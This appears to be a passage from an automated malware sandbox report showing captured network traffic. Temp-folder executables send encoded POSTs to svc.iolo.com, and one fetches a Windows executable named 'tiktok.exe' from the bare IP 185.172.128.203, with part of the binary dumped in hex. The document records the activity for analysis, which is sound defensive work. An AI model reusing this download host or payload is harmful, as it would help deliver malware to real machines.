Apr 27, 2024 02:19:53.838253975 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 27, 2024 02:19:53.838324070 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 27, 2024 02:19:54.008346081 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49760	20.157.87.45	80	3156	C:\Users\user\AppData\Local\Temp\u3bs.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:20:48.463546991 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 02:20:48.660551071 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 27, 2024 02:20:48.844949007 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Sat, 27 Apr 2024 00:20:48 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49762	185.172.128.203	80	6808	C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:20:51.360459089 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 27, 2024 02:20:51.532069921 CEST	1289	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:20:51 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
Apr 27, 2024 02:20:51.532136917 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 27, 2024 02:20:51.532239914 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 27, 2024 02:20:51.532366037 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 27, 2024 02:20:51.532404900 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 27, 2024 02:20:51.532459021 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 27, 2024 02:20:51.532546997 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 27, 2024 02:20:51.532643080 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 27, 2024 02:20:51.532680988 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 27, 2024 02:20:51.532720089 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 27, 2024 02:20:51.703085899 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49769	20.157.87.45	80

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:21:09.521313906 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 02:21:10.010787964 CEST	566	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library) Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 51 33 71 38 65 56 30 51 78 2b 73 52 56 72 77 49 75 4f 64 70 78 62 43 51 36 2f 67 70 64 72 64 50 63 30 64 50 70 32 79 46 69 54 74 58 70 58 4c 46 63 32 30 4d 4d 50 74 37 33 36 44 48 48 6e 46 55 74 42 38 52 42 79 4a 6e 55 70 30 75 32 2f 56 64 71 67 4c 49 43 66 4c 4c 31 72 4a 4a 41 6a 46 6d 5a 71 67 55 65 69 35 45 5a 7a 68 66 6e 45 69 52 35 64 71 66 51 33 5a 30 59 4c 6e 46 74 56 4f 57 77 4d 46 67 34 6c 76 77 70 4d 69 4e 72 74 4f 78 35 4c 64 2b 59 76 4f 6c 55 4b 53 71 32 41 37 74 43 6d 4a 33 39 4e 2f 6c 79 79 4b 37 2f 69 64 52 59 51 34 39 4f 47 6a 79 4b 6d 52 4c 7a 41 44 56 4c 78 6f 33 6a 6e 46 4e 69 4c 45 6e 38 30 52 57 59 33 42 73 30 4c 43 33 30 3d Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tCmJ39N/lyyK7/idRYQ49OGjyKmRLzADVLxo3jnFNiLEn80RWY3Bs0LC30=
Apr 27, 2024 02:21:10.196558952 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb5 date: Sat, 27 Apr 2024 00:21:09 GMT set-cookie: SERVERID=svc5; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49751	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:16 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-27 00:20:16 UTC	1703	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:20:16 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-KcmahvSQI2xx3xEmKmiCbQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-27 00:20:16 UTC	799	IN	Data Raw: 33 31 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 66 6c 20 64 72 61 66 74 20 62 79 72 6f 6e 20 6d 75 72 70 68 79 22 2c 22 66 63 63 20 69 6e 74 65 72 6e 65 74 22 2c 22 6c 65 67 6f 20 6d 69 6c 6b 79 20 77 61 79 20 67 61 6c 61 78 79 22 2c 22 6b 61 6e 73 61 73 20 63 69 74 79 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 77 6f 72 64 6c 65 20 74 6f 64 61 79 20 61 6e 73 77 65 72 20 61 70 72 69 6c 20 32 36 22 2c 22 73 68 61 6d 72 6f 63 6b 20 67 6f 6c 64 65 6e 20 72 65 74 72 69 65 76 65 72 20 70 75 70 70 79 22 2c 22 77 68 61 74 20 64 72 61 66 74 20 70 69 63 6b 73 20 64 6f 20 65 61 67 6c 65 73 20 68 61 76 65 20 69 6e 20 32 30 32 34 22 2c 22 6c 61 74 69 6e 20 61 6d 65 72 69 63 61 6e 20 6d 75 73 69 63 20 61 77 61 72 64 73 20 77 69 6e 6e 65 72 73 22 5d 2c 5b 22 22 2c 22 22 Data Ascii: 318)]}'["",["nfl draft byron murphy","fcc internet","lego milky way galaxy","kansas city tornadoes","wordle today answer april 26","shamrock golden retriever puppy","what draft picks do eagles have in 2024","latin american music awards winners"],["",""
2024-04-27 00:20:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49752	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:16 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49749	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:16 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-27 00:20:16 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIwImxsQYQrJCikwMSBJoQwLk Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sat, 27 Apr 2024 00:20:16 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-27-00; expires=Mon, 27-May-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs; expires=Sun, 27-Oct-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 00:20:16 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49750	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:16 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
